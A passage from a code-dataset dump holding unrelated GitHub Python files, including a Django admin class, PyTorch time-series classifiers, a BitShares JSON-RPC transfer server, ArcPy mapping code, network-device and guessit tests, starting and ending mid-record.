get_link_to_admin_form_for_object\nfrom ..models import KarmaBoard\n\n\n@admin.register(KarmaBoard)\nclass KarmaBoardAdmin(admin.ModelAdmin):\n list_display = [\n \"id\",\n \"owner_link\",\n \"name\",\n \"value_step\",\n \"unsplash_photo_link\",\n \"modified_at\",\n \"created_at\",\n ]\n list_display_links = list_display\n ordering = [\"-created_at\"]\n search_fields = [\"id\", \"name\", \"karmaboarduser__user__username\"]\n date_hierarchy = \"modified_at\"\n list_filter = [\"karmaboarduser__user__is_demo\"]\n\n fieldsets = [\n [\n \"None\",\n {\n \"fields\": [\n \"id\",\n \"name\",\n \"value_step\",\n \"unsplash_photo\",\n ]\n },\n ],\n [\"Dates\", {\"fields\": [\"modified_at\", \"created_at\"]}],\n ]\n readonly_fields = [\"id\", \"modified_at\", \"created_at\"]\n\n def owner_link(self, karmaboard: KarmaBoard) -> str:\n return get_link_to_admin_form_for_object(\n obj=karmaboard.owner,\n inner_html=karmaboard.owner.username,\n )\n\n owner_link.short_description = \"Owner\"\n\n def unsplash_photo_link(self, karmaboard: KarmaBoard) -> str:\n return get_link_to_admin_form_for_object(\n obj=karmaboard.unsplash_photo,\n inner_html=karmaboard.unsplash_photo.id,\n )\n\n unsplash_photo_link.short_description = \"Unsplash Photo\"\n unsplash_photo_link.admin_order_field = \"unsplash_photo__id\"\n","repo_name":"CapedHero/karmaspace-backend","sub_path":"src/karmaspace/admin/karmaboard.py","file_name":"karmaboard.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"29327567350","text":"import urllib.request\nimport json\n\nappid = ''\nwith open('weather.json','r') as f:\n appid = json.loads(f.read())['appid']\nurl = 'http://api.openweathermap.org/data/2.5/weather?q=London'+'&appid='+appid\n\nwith urllib.request.urlopen(url) as response:\n html = response.read()\n print(json.loads(html))\n","repo_name":"ellinx/scratch","sub_path":"python/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"28286351620","text":"import pytest\r\nimport time\r\nimport sys\r\nfrom os.path import dirname, abspath\r\nfrom page_obj.scg.scg_def import *\r\nfrom page_obj.scg.scg_def_dhcp import *\r\nfrom page_obj.scg.scg_def_log import *\r\nfrom page_obj.scg.scg_def_mac import *\r\nfrom page_obj.common.rail import *\r\nfrom page_obj.common.telnet import *\r\nfrom page_obj.common.ssh import *\r\nsys.path.insert(0, dirname(dirname(abspath(__file__))))\r\n\r\ntest_id = \"139592\"\r\n\r\n\r\ndef test_c139592(browser):\r\n\r\n\ttry:\r\n\t\tresult1 = get_dut_interface_mac_jyl(dut_name=dev2, interface=interface_name_1).lower()\r\n\t\tprint(result1)\r\n\t\tshell_cmd = Shell_SSH()\r\n\t\tshell_cmd.connect(hostip=dev2)\r\n\t\tshell_cmd.ping_cmd(ipadd=dev3)\r\n\t\ttime.sleep(2)\r\n\t\tshell_cmd.close()\r\n\t\tlogin_web(browser, url=dev3)\r\n\t\t# arp_list = get_dynamic_arp_all(browser)\r\n\t\t# print(arp_list)\r\n\t\tset_arp_dyn_to_static(browser, ipadd=dev2)\r\n\t\tarp_list_static = get_static_arp_all(browser)\r\n\t\tdel_static_arp(browser)\r\n\t\ttry:\r\n\t\t\tassert [dev2, result1, interface_name_1, ''] in arp_list_static\r\n\t\t\trail_pass(test_run_id, test_id)\r\n\r\n\t\texcept Exception as err1:\r\n\t\t\tprint(err1)\r\n\t\t\trail_fail(test_run_id, test_id)\r\n\t\t\tassert [dev2, result1, interface_name_1, ''] in arp_list_static\r\n\r\n\r\n\texcept Exception as err:\r\n\t\t# 如果上面的步骤有报错,重新设备,恢复配置\r\n\t\tprint(err)\r\n\t\trail_fail(test_run_id, test_id)\r\n\t\treload(hostip=[dev3, dev2])\r\n\t\tassert False\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\tpytest.main([\"-v\", \"-s\", \"test_c\" + test_id + \".py\"])","repo_name":"lizhuoya1111/Automated_testing_practice","sub_path":"pyautoTest-master(ICF-7.5.0)/test_case/scg/scg_ARP/test_c139592.py","file_name":"test_c139592.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"24191886479","text":"from datetime import datetime\nfrom test.utils import TestUtils\n\nimport numpy as np\n\nfrom src.biota_models.vegetation.output.veg_output_model import (\n VegetationHisOutput,\n VegetationMapOutput,\n VegetationOutputParameters,\n _VegetationOutput,\n)\nfrom src.core.output.base_output_model import BaseOutput\nfrom src.core.output.output_protocol import OutputProtocol\n\n\nclass TestVegetationOutputParameters:\n def test_init_modelattributes(self):\n test_params = VegetationOutputParameters()\n assert test_params.hydro_mor is True\n assert test_params.veg_characteristics is True\n assert test_params.valid_output()\n\n\nclass TestCoralMapOutput:\n def test_init_mapoutput(self):\n test_dir = TestUtils.get_local_test_data_dir(\"BaseOutput\")\n xy_array = np.array([[0, 1], [1, 0]], np.float64)\n test_map_output = VegetationMapOutput(\n output_dir=test_dir, xy_coordinates=xy_array, first_year=2021\n )\n assert isinstance(test_map_output, OutputProtocol)\n assert isinstance(test_map_output, _VegetationOutput)\n assert isinstance(test_map_output, BaseOutput)\n assert isinstance(test_map_output.output_params, VegetationOutputParameters)\n\n assert test_map_output.output_filepath == test_dir / \"VegModel_map.nc\"\n assert (test_map_output.xy_coordinates == xy_array).all()\n assert test_map_output.first_year == 2021\n assert test_map_output.space == len(xy_array)\n\n\nclass TestVegetationHisOutput:\n def test_init_mapoutput(self):\n test_dir = TestUtils.get_local_test_data_dir(\"BaseOutput\")\n xy_array = np.array([[0, 1], [1, 0]], np.float64)\n idx_array = np.array([[1, 0], [0, 1]], np.float64)\n first_date = datetime.now()\n test_his_output = VegetationHisOutput(\n output_dir=test_dir,\n xy_stations=xy_array,\n idx_stations=idx_array,\n first_date=first_date,\n )\n assert isinstance(test_his_output, OutputProtocol)\n assert isinstance(test_his_output, _VegetationOutput)\n assert isinstance(test_his_output, BaseOutput)\n assert isinstance(test_his_output.output_params, VegetationOutputParameters)\n assert test_his_output.output_filepath == test_dir / \"VegModel_his.nc\"\n assert (test_his_output.xy_stations == xy_array).all()\n assert (test_his_output.idx_stations == idx_array).all()\n assert test_his_output.first_date == first_date\n","repo_name":"Deltares/NBSDynamics","sub_path":"test/biota_models/vegetation/output/test_veg_output_model.py","file_name":"test_veg_output_model.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"43"} +{"seq_id":"5074476245","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass CNN(nn.Module):\n def __init__(self, in_len, input_dim=9, output_dim=3):\n \"\"\"Pytorch 1D CNN model for time series classification. Model architecture from:\n Ye Yuan, et al., A general end-to-end diagnosis framework for manufacturing systems, National Science Review, Volume 7, Issue 2, February 2020, Pages 418–429, https://doi.org/10.1093/nsr/nwz190 \n \n Arguments:\n in_len : int\n length of time sequence\n input_dim : int\n number of channels (sensor time sequences)\n output_dim : int\n number of classification labels \n \"\"\"\n super(CNN, self).__init__()\n self.in_len = in_len\n self.input_dim = input_dim\n self.output_dim = output_dim\n \n self.conv_block = nn.Sequential(\n nn.Conv1d(self.input_dim, 64, 10, 5),\n nn.BatchNorm1d(64),\n nn.ReLU(inplace=True),\n nn.MaxPool1d(2),\n nn.Conv1d(64, 64, 2),\n nn.BatchNorm1d(64),\n nn.ReLU(inplace=True),\n nn.MaxPool1d(2)\n )\n self.fc_block = nn.Sequential(\n nn.Linear(self.fc_len(), 500), # calculate input dimension adaptively\n nn.BatchNorm1d(500),\n nn.ReLU(inplace=True),\n nn.Linear(500, 50),\n nn.ReLU(inplace=True)\n )\n self.classifier = nn.Linear(50, self.output_dim)\n\n def forward(self, x):\n \"\"\"Forward pass of model network \n \n Inputs:\n x: pytorch tensor (batch, channels, sequence)\n batch of input data\n \n Outputs:\n x: pytorch tensor (batch, labels)\n batch of labels\n \"\"\"\n x = self.conv_block(x)\n x = x.view(x.size(0), -1)\n x = self.fc_block(x)\n x = self.classifier(x)\n return x\n \n def out_len_conv(self, in_len, conv_layer):\n \"\"\"Calculate output length of 1D conv layer \n \n Inputs:\n in_len: int\n input dimension of conv layer\n conv_layer: object\n pytorch conv1d \n \n Outputs:\n out_len: int\n output dimension of conv layer\n \"\"\"\n out_len = (in_len-conv_layer.kernel_size[0]+2*conv_layer.padding[0])/conv_layer.stride[0]+1\n return out_len\n\n def fc_len(self):\n \"\"\"Calculate output length of conv_block for linear layer connection \n \"\"\"\n out = self.out_len_conv(self.in_len, self.conv_block[0])\n out = int(out/2)\n out = self.out_len_conv(out, self.conv_block[4]) \n out = int(out/2)\n out = out*self.conv_block[4].out_channels\n return out\n \n\nclass LSTM(nn.Module):\n def __init__(self, input_dim, hidden_dim=20, num_layers=2, output_dim=1):\n \"\"\"Pytorch vanilla LSTM model for time series classification \n \n Arguments:\n input_dim : int\n number of channels (sensor time sequences) \n hidden_dim : int\n hidden layer size\n num_layers : int\n number of layers in LSTM block\n output_dim : int\n number of classification labels \n \"\"\"\n super(LSTM, self).__init__()\n self.input_dim = input_dim\n self.hidden_dim = hidden_dim\n self.num_layers = num_layers\n self.output_dim = output_dim\n\n self.lstm = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers)\n \n self.fc_block = nn.Sequential(\n nn.Linear(self.hidden_dim, self.hidden_dim),\n nn.BatchNorm1d(self.hidden_dim),\n nn.ReLU(inplace=True),\n nn.Linear(self.hidden_dim, self.hidden_dim),\n nn.BatchNorm1d(self.hidden_dim),\n nn.ReLU(inplace=True),\n ) \n self.classifier = nn.Linear(self.hidden_dim, self.output_dim)\n\n def forward(self, input):\n \"\"\"Forward pass of model network \n \n Inputs:\n input: pytorch tensor (batch, channels, sequence)\n batch of input data\n \n Outputs:\n out: pytorch tensor (batch, labels)\n batch of labels\n \"\"\"\n out, hidden = self.lstm(input.permute(2,0,1)) # (batch, channels, sequence) -> [sequence, batch, channels]\n out = self.fc_block(out[-1])\n out = self.classifier(out)\n return out\n\n\nclass LSTMattn(nn.Module):\n \"\"\"Pytorch LSTM model with attention for time series classification. \n Attention model from:\n M.Luong et al, Effective Approaches to Attention-based Neural Machine Translation, 2015, arXiv:1508.04025\n Implementation from:\n https://github.com/prakashpandey9/Text-Classification-Pytorch\n https://github.com/spro/practical-pytorch/tree/master/seq2seq-translation \n \n Arguments:\n input_dim : int\n number of channels (sensor time sequences) \n hidden_dim : int\n hidden layer size\n num_layers : int\n number of layers in LSTM block\n output_dim : int\n number of classification labels \n \"\"\"\n def __init__(self, input_dim, hidden_dim, num_layers=2, output_dim=1):\n super(LSTMattn, self).__init__()\n self.input_dim = input_dim\n self.hidden_dim = hidden_dim\n self.num_layers = num_layers\n self.output_dim = output_dim\n\n self.lstm = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, dropout=0.8)\n self.fc_block = nn.Sequential(\n nn.Linear(self.hidden_dim, self.hidden_dim),\n nn.BatchNorm1d(self.hidden_dim),\n nn.ReLU(inplace=True)\n ) \n self.concat = nn.Linear(self.hidden_dim * 2, self.hidden_dim) \n self.classifier = nn.Linear(self.hidden_dim, self.output_dim)\n \n def attention(self, lstm_output, hidden):\n \"\"\"Luong attention model for sequence classification \n \n Inputs:\n lstm_output: pytorch tensor (sequence, batch, hidden)\n output of LSTM \n hidden: pytorch tensor (batch, hidden)\n hidden state of LSTM\n \n Outputs:\n output: pytorch tensor (batch, hidden)\n hidden state with applied attention\n \"\"\"\n hidden = hidden.squeeze(0)\n lstm_output = lstm_output.permute(1,0,2)\n\n scores = torch.bmm(lstm_output, hidden.unsqueeze(2))\n attn_weights = F.softmax(scores, 1) # eq.7 \n context = torch.bmm(lstm_output.transpose(1, 2), attn_weights).squeeze(2)\n \n concat_input = torch.cat((hidden, context), 1)\n output = torch.tanh(self.concat(concat_input)) # eq. 5\n \n return output\n\n def forward(self, input):\n \"\"\"Forward pass of model network \n \n Inputs:\n input: pytorch tensor (batch, channels, sequence)\n batch of input data\n \n Outputs:\n out: pytorch tensor (batch, labels)\n batch of labels\n \"\"\"\n input = input.permute(2,0,1)\n lstm_out, (h,c) = self.lstm(input)\n out = self.attention(lstm_out, h[-1])\n out = self.classifier(out)\n \n return out\n \n\nclass MultiClassifier(nn.Module):\n \"\"\"Pytorch multi task classifier block for pump maintenance dataset. \n See:\n https://discuss.pytorch.org/t/how-to-do-multi-task-training/14879/7\n https://discuss.pytorch.org/t/how-to-learn-the-weights-between-two-losses/39681/2\n \"\"\"\n def __init__(self, input_dim):\n super(MultiClassifier, self).__init__()\n self.fc_0 = nn.Linear(input_dim, 3)\n self.fc_1 = nn.Linear(input_dim, 4)\n self.fc_2 = nn.Linear(input_dim, 3)\n self.fc_3 = nn.Linear(input_dim, 4)\n\n def forward(self, x):\n x_0 = self.fc_0(x)\n x_1 = self.fc_1(x)\n x_2 = self.fc_2(x)\n x_3 = self.fc_3(x)\n \n return x_0, x_1, x_2, x_3","repo_name":"France1/predictive-maintenance-pytorch","sub_path":"model/net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":8171,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"43"} +{"seq_id":"17427338101","text":"# -*- coding:utf-8 -*-\r\n\r\nimport asyncio\r\nfrom aiohttp import web\r\nfrom .asyncrpc import AsyncRPC\r\nfrom .transfer import Transfer\r\nfrom .sysconfig import SysConfig\r\nfrom jsonrpcserver.aio import methods\r\n\r\n@methods.add\r\nasync def account(context):\r\n ''' 账户信息\r\n '''\r\n return SysConfig().account\r\n\r\n@methods.add\r\nasync def get_balances(context):\r\n ''' 获取余额\r\n '''\r\n result = []\r\n client = context['client']\r\n server = context['server']\r\n balances = await client.get_named_account_balances(SysConfig().account, [])\r\n for asset in balances:\r\n asset_info = await server.get_asset_info(client, asset['asset_id'])\r\n result.append({\r\n 'id': asset_info['id'],\r\n 'symbol': asset_info['symbol'],\r\n 'amount': str(float(asset['amount'])/float(10**int(asset_info['precision'])))\r\n })\r\n return result\r\n\r\n@methods.add\r\nasync def transfer(to, symbol_or_id, amount, memo, context):\r\n ''' 资产转账\r\n '''\r\n client = context['client']\r\n server = context['server']\r\n account = await server.account_info(client)\r\n asset = await server.get_asset_info(client, symbol_or_id)\r\n transfer = Transfer(client, account)\r\n return await transfer.send_to(to, asset, float(amount), memo)\r\n\r\n@methods.add\r\nasync def get_transfer_fees(symbols_or_ids : list, context):\r\n ''' 获取转账手续费\r\n '''\r\n assets = []\r\n client = context['client']\r\n server = context['server']\r\n for asset in symbols_or_ids:\r\n assets.append(await server.get_asset_info(client, asset))\r\n return await server.calcul_transfer_fees(client, assets)\r\n\r\nclass RpcServer(object):\r\n ''' json-rpc服务\r\n '''\r\n asset_info = {}\r\n\r\n def __init__(self, loop=None):\r\n self._loop = loop\r\n if self._loop is None:\r\n self._loop = asyncio.get_event_loop()\r\n self._started = False\r\n self._account_info = None\r\n\r\n def listen(self, host, port):\r\n ''' 监听服务\r\n '''\r\n if not self._started:\r\n app = web.Application(loop=self._loop)\r\n app.router.add_post('/', self._handle)\r\n self._loop.run_until_complete(\r\n self._loop.create_server(app.make_handler(), host, port))\r\n self._started = True\r\n\r\n async def account_info(self, client):\r\n if self._account_info is None:\r\n self._account_info = await client.get_account_by_name(SysConfig().account)\r\n return self._account_info\r\n\r\n async def get_asset_info(self, client, symbol_or_id):\r\n ''' 获取资产信息\r\n '''\r\n if symbol_or_id not in self.asset_info:\r\n asset = (await client.lookup_asset_symbols([symbol_or_id]))[0]\r\n self.asset_info[asset['id']] = asset\r\n self.asset_info[asset['symbol']] = asset\r\n return self.asset_info[symbol_or_id]\r\n\r\n\r\n async def get_transfer_fee(self, client):\r\n ''' 获取转账费用\r\n '''\r\n obj = (await client.get_objects(['2.0.0']))[0]\r\n fees = obj['parameters']['current_fees']['parameters']\r\n scale = float(obj['parameters']['current_fees']['scale'])\r\n for f in fees:\r\n if f[0] == 0:\r\n return (f[1], scale)\r\n raise RuntimeError('Invalid result!')\r\n\r\n async def calcul_transfer_fees(self, client, assets):\r\n ''' 计算转账费用\r\n '''\r\n fee_list = []\r\n fee, scale = await self.get_transfer_fee(client)\r\n for asset_info in assets:\r\n precision = asset_info['precision']\r\n base = asset_info['options']['core_exchange_rate']['base']\r\n quote = asset_info['options']['core_exchange_rate']['quote']\r\n\r\n total = (float(base['amount'])*(fee['fee']+fee['price_per_kbyte']))/float(quote['amount'])\r\n total = total*scale/1e4/10**precision\r\n fee_list.append(str(round(total, 2)))\r\n return fee_list\r\n\r\n async def _handle(self, request):\r\n ''' 分发请求\r\n '''\r\n request = await request.text()\r\n client = AsyncRPC(SysConfig().access, self._loop)\r\n if not await client.wait_for_ready():\r\n raise RuntimeError('Websocket connection failed')\r\n response = await methods.dispatch(request, context={'server': self, 'client': client})\r\n await client.close()\r\n if response.is_notification:\r\n return web.Response()\r\n else:\r\n return web.json_response(response, status=response.http_status)\r\n","repo_name":"zhangpanyi/btsmonitor","sub_path":"app/rpcserver.py","file_name":"rpcserver.py","file_ext":"py","file_size_in_byte":4558,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"43"} +{"seq_id":"34059000278","text":"#coding:utf-8\r\n'''\r\n# @Title: homework\r\n# @Description: \r\n# @author :邵鑫\r\n# @date :2019/04\r\n'''\r\nimport arcpy\r\nmymxd = \"e:/py/data/in_data/test.mxd\"\r\nmymxd1 = \"e:/py/data/in_data/test1.mxd\"\r\nmymxd2= \"e:/py/data/in_data/homework.mxd\"\r\n\r\ndef MapDocument(mymxd):\r\n '''\r\n 配置属性\r\n :param mymxd:\r\n :return:\r\n '''\r\n mymap = arcpy.mapping.MapDocument(mymxd)\r\n print(mymap.title)\r\n print(mymap.summary)\r\n print(mymap.description)\r\n print(mymap.author)\r\n print(mymap.credits)\r\n print(mymap.tags)\r\n print(mymap.hyperlinkBase)\r\ndef ListLayer(mymxd):\r\n '''\r\n 图层名\r\n :param mymxd:\r\n :return:\r\n '''\r\n mymap = arcpy.mapping.MapDocument(mymxd)\r\n mydfs = arcpy.mapping.ListDataFrames(mymap)\r\n for mydf in mydfs:\r\n layers = arcpy.mapping.ListLayers(mymap, \"\", mydf)\r\n layers = arcpy.mapping.ListLayers(mymap)\r\n for layer in layers:\r\n print(layer.name)\r\ndef LayerLaber(mymxd):\r\n '''\r\n 图层标注\r\n :param mymxd:\r\n :return:\r\n '''\r\n mymap = arcpy.mapping.MapDocument(mymxd)\r\n layers = arcpy.mapping.ListLayers(mymap)\r\n layer = layers[0]\r\n layer.showLabels = True\r\n layer.labelClasses[0].expression = '[x坐标] + \",\"+[y坐标]'\r\n mymap.save()\r\ndef AddLayer(mymxd):\r\n mymap = arcpy.mapping.MapDocument(mymxd)\r\n df = arcpy.mapping.ListDataFrames(mymap)[0]\r\n mylayer = arcpy.mapping.Layer(\"e:/py/data/clip.lyr\")\r\n arcpy.mapping.AddLayer(df, mylayer)\r\n mymap.save()\r\ndef DataRenderingOutput(mymxd):\r\n mymap = arcpy.mapping.MapDocument(mymxd)\r\n layers = arcpy.mapping.ListLayers(mymap)\r\n for layer in layers:\r\n layer.showLabels = True\r\n layer.labelClasses[0].expression = '[NAME]'\r\n arcpy.RefreshTOC()\r\n arcpy.RefreshActiveView()\r\n mypdf = arcpy.mapping.PDFDocumentCreate(\"e:/data/newpdf.pdf\")\r\n lyr = arcpy.mapping.ListLayers(mymap)[4]\r\n df = arcpy.mapping.ListDataFrames(mymap)[0]\r\n rows = arcpy.SearchCursor(lyr)\r\n for row in rows:\r\n geo = row.shape\r\n # df.zoomToSelectedFeatures()\r\n df.panToExtent(geo.extent)\r\n outFile = \"e://data//\" + row.getValue(\"NAME\") + \".pdf\"\r\n outFile1=outFile.replace('?', '')\r\n arcpy.mapping.ExportToPDF(mymap, outFile1)\r\n mypdf.appendPages(outFile1)\r\n mypdf.saveAndClose()\r\n mymap.save()\r\n\r\n\r\n # lyr = arcpy.mapping.ListLayers(mymap)[4]\r\n # df = arcpy.mapping.ListDataFrames(mymap)[0]\r\n # rows = arcpy.SearchCursor(lyr)\r\n # for row in rows:\r\n # geo = row.shape\r\n # df.panToExtent(geo.extent)\r\n # outFile = r\"d:\\data\\\\\" + row.getValue(\"NAME\") + \".pdf\"\r\n # arcpy.mapping.ExportToPDF(mymap, outFile)\r\n # mymap.saveAndClose()\r\n\r\n #layers = arcpy.mapping.ListLayers(mymap)\r\n # for layer in layers:\r\n # layer.showLabels = True\r\n # layer.labelClasses[0].expression = '[NAME]'\r\n # arcpy.RefreshTOC()\r\n # arcpy.RefreshActiveView()\r\n\r\nif __name__==\"__main__\":\r\n # MapDocument(mymxd)\r\n # ListLayer(mymxd)\r\n #LayerLaber(mymxd1)\r\n DataRenderingOutput(mymxd2)\r\n","repo_name":"ZzuGiser/arcpy","sub_path":"class/test_0423_mapping.py","file_name":"test_0423_mapping.py","file_ext":"py","file_size_in_byte":3092,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"8297314134","text":"#!/usr/bin/python3\nimport re\nimport sys\n\nlines = list(line.strip() for line in sys.stdin if line.strip())\n\nreindeers = []\nfor line in lines:\n mo = re.match(r'^(.+)? can fly (\\d+) km/s for (\\d+) seconds, but then must rest for (\\d+) seconds\\.$', line)\n name, speed, dash, rest = mo.groups()\n reindeers.append((int(speed), int(dash), int(rest)))\n\ndef calc(time, speed, dash, rest):\n period = dash + rest\n distance = (time // period) * speed * dash\n period_rest = time % period\n distance += min(period_rest, dash) * speed\n\n return distance\n\ndef solve(time, reindeers):\n distances = [calc(time, speed, dash, rest) for (speed, dash, rest) in reindeers]\n distances.sort()\n return distances[-1]\n\ndef solve2(time, reindeers):\n points = [0 for _ in reindeers]\n for secs in range(1, time + 1):\n distances = [calc(secs, speed, dash, rest) for (speed, dash, rest) in reindeers]\n winner = max(distances)\n for i in range(len(reindeers)):\n if distances[i] == winner:\n points[i] += 1\n\n return max(points)\n\nprint(solve(2503, reindeers))\nprint(solve2(2503, reindeers))\n","repo_name":"or/adventofcode","sub_path":"14/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"73921561729","text":"\"\"\"\nThis file is to display the human model into bioviz\n\"\"\"\nimport bioviz\n\n\nexport_model = True\nbackground_color = (1, 1, 1) if export_model else (0.5, 0.5, 0.5)\nshow_gravity_vector = False if export_model else True\nshow_floor = False if export_model else True\nshow_local_ref_frame = False if export_model else True\nshow_global_ref_frame = False if export_model else True\nshow_markers = False if export_model else True\nshow_mass_center = False if export_model else True\nshow_global_center_of_mass = False if export_model else True\nshow_segments_center_of_mass = False if export_model else True\n\n# model_name = \"arm26.bioMod\"\nmodel_name = \"arm26_viz.bioMod\" # this model was only used to display the results because it included more meshfiles.\nb = bioviz.Viz(\n model_name,\n show_gravity_vector=show_gravity_vector,\n show_floor=show_floor,\n show_local_ref_frame=show_local_ref_frame,\n show_global_ref_frame=show_global_ref_frame,\n show_markers=show_markers,\n show_mass_center=show_mass_center,\n show_global_center_of_mass=show_global_center_of_mass,\n show_segments_center_of_mass=show_segments_center_of_mass,\n mesh_opacity=1,\n background_color=background_color,\n)\nb.set_camera_position(-0.5, 3.5922578781963685, 0.1)\nb.resize(1000, 1000)\nif export_model:\n b.snapshot(\"doc/model.png\")\nb.exec()\n\nprint(\"roll\")\nprint(b.get_camera_roll())\nprint(\"zoom\")\nprint(b.get_camera_zoom())\nprint(\"position\")\nprint(b.get_camera_position())\nprint(\"get_camera_focus_point\")\nprint(b.get_camera_focus_point())","repo_name":"s2mLab/dumbbell_lifting","sub_path":"dumbbell_optimal_control/models/show_the_model.py","file_name":"show_the_model.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"1740686575","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nfrom guessit import base_text_type, u\n\nfrom unittest import TestCase, TestLoader, TextTestRunner\nimport shlex\n\nimport yaml, logging, sys, os\nfrom os.path import *\n\n\ndef currentPath():\n '''Returns the path in which the calling file is located.'''\n return dirname(join(os.getcwd(), sys._getframe(1).f_globals['__file__']))\n\n\ndef addImportPath(path):\n '''Function that adds the specified path to the import path. The path can be\n absolute or relative to the calling file.'''\n importPath = abspath(join(currentPath(), path))\n sys.path = [importPath] + sys.path\n\nlog = logging.getLogger(__name__)\n\nfrom guessit.plugins import transformers\nimport guessit\nfrom guessit.options import option_parser\nfrom guessit import *\nfrom guessit.matcher import *\nfrom guessit.fileutils import *\n\n\ndef allTests(testClass):\n return TestLoader().loadTestsFromTestCase(testClass)\n\n\nclass TestGuessit(TestCase):\n\n def checkMinimumFieldsCorrect(self, filename, filetype=None, remove_type=True,\n exclude_files=None):\n groundTruth = yaml.load(load_file_in_same_dir(__file__, filename))\n\n def guess_func(string, options=None):\n return guess_file_info(string, options=options, type=filetype)\n\n return self.checkFields(groundTruth, guess_func, remove_type, exclude_files)\n\n def checkFields(self, groundTruth, guess_func, remove_type=True,\n exclude_files=None):\n total = 0\n exclude_files = exclude_files or []\n\n fails = {}\n additionals = {}\n\n for filename, required_fields in groundTruth.items():\n filename = u(filename)\n if filename in exclude_files:\n continue\n\n log.debug('\\n' + '-' * 120)\n log.info('Guessing information for file: %s' % filename)\n\n options = required_fields.pop('options') if 'options' in required_fields else None\n\n if options:\n args = shlex.split(options)\n options, _ = option_parser.parse_args(args)\n options = vars(options)\n found = guess_func(filename, options)\n\n total = total + 1\n\n # no need for these in the unittests\n if remove_type:\n try:\n del found['type']\n except:\n pass\n for prop in ('container', 'mimetype'):\n if prop in found:\n del found[prop]\n\n # props which are list of just 1 elem should be opened for easier writing of the tests\n for prop in ('language', 'subtitleLanguage', 'other', 'special'):\n value = found.get(prop, None)\n if isinstance(value, list) and len(value) == 1:\n found[prop] = value[0]\n\n # look for missing properties\n for prop, value in required_fields.items():\n if prop not in found:\n log.debug(\"Prop '%s' not found in: %s\" % (prop, filename))\n if not filename in fails:\n fails[filename] = [] \n fails[filename].append(\"'%s' not found in: %s\" % (prop, filename))\n continue\n\n # if both properties are strings, do a case-insensitive comparison\n if (isinstance(value, base_text_type) and\n isinstance(found[prop], base_text_type)):\n if value.lower() != found[prop].lower():\n log.debug(\"Wrong prop value [str] for '%s': expected = '%s' - received = '%s'\" % (prop, u(value), u(found[prop])))\n if not filename in fails:\n fails[filename] = [] \n fails[filename].append(\"'%s': expected = '%s' - received = '%s'\" % (prop, u(value), u(found[prop])))\n\n # if both are lists, we assume list of strings and do a case-insensitive\n # comparison on their elements\n elif isinstance(value, list) and isinstance(found[prop], list):\n s1 = set(u(s).lower() for s in value)\n s2 = set(u(s).lower() for s in found[prop])\n if s1 != s2:\n log.debug(\"Wrong prop value [list] for '%s': expected = '%s' - received = '%s'\" % (prop, u(value), u(found[prop])))\n if not filename in fails:\n fails[filename] = [] \n fails[filename].append(\"'%s': expected = '%s' - received = '%s'\" % (prop, u(value), u(found[prop])))\n # otherwise, just compare their values directly\n else:\n if found[prop] != value:\n log.debug(\"Wrong prop value for '%s': expected = '%s' [%s] - received = '%s' [%s]\" % (prop, u(value), type(value), u(found[prop]), type(found[prop])))\n if not filename in fails:\n fails[filename] = [] \n fails[filename].append(\"'%s': expected = '%s' [%s] - received = '%s' [%s]\" % (prop, u(value), type(value), u(found[prop]), type(found[prop])))\n\n # look for additional properties\n for prop, value in found.items():\n if prop not in required_fields:\n log.debug(\"Found additional info for prop = '%s': '%s'\" % (prop, u(value)))\n if not filename in additionals:\n additionals[filename] = [] \n additionals[filename].append(\"'%s': '%s'\" % (prop, u(value)))\n\n correct = total - len(fails)\n log.info('SUMMARY: Guessed correctly %d out of %d filenames' % (correct, total))\n\n for failed_entry, failed_properties in fails.items():\n log.error('---- ' + failed_entry + ' ----')\n for failed_property in failed_properties:\n log.error(\"FAILED: \" + failed_property)\n\n for additional_entry, additional_properties in additionals.items():\n log.warn('---- ' + additional_entry + ' ----')\n for additional_property in additional_properties:\n log.warn(\"ADDITIONAL: \" + additional_property)\n\n self.assertTrue(correct == total,\n msg='Correct: %d < Total: %d' % (correct, total))\n","repo_name":"lad1337/XDM","sub_path":"site-packages/guessit_new/test/guessittest.py","file_name":"guessittest.py","file_ext":"py","file_size_in_byte":6410,"program_lang":"python","lang":"en","doc_type":"code","stars":203,"dataset":"github-code","pt":"43"} +{"seq_id":"1695631769","text":"import sys\nfrom collections import deque\n\ninput = sys.stdin.readline\n\n\ndef make_order(indegree, team, n, graph):\n for i in range(n):\n for j in range(i + 1, n):\n indegree[team[j]] += 1\n graph[team[i]].append(team[j])\n\n\ndef topology_sort(indegree, graph, n):\n q = deque()\n result = []\n for i in range(1, n + 1):\n if indegree[i] == 0:\n q.append(i)\n\n cnt = 0\n while q:\n cnt += 1\n curr = q.popleft()\n result.append(curr)\n zero_indegree_exist = False\n for i in graph[curr]:\n indegree[i] -= 1\n if indegree[i] == 0:\n if zero_indegree_exist:\n return \"?\"\n q.append(i)\n zero_indegree_exist = True\n\n if cnt != n:\n return \"IMPOSSIBLE\"\n return \" \".join(str(i) for i in result)\n\n\nT = int(input())\nanswers = []\nfor _ in range(T):\n n = int(input())\n indegree = [0] * (n + 1)\n team = list(map(int, input().split()))\n graph = [[] for _ in range(n + 1)]\n\n make_order(indegree, team, n, graph)\n\n m = int(input())\n for _ in range(m):\n a, b = map(int, 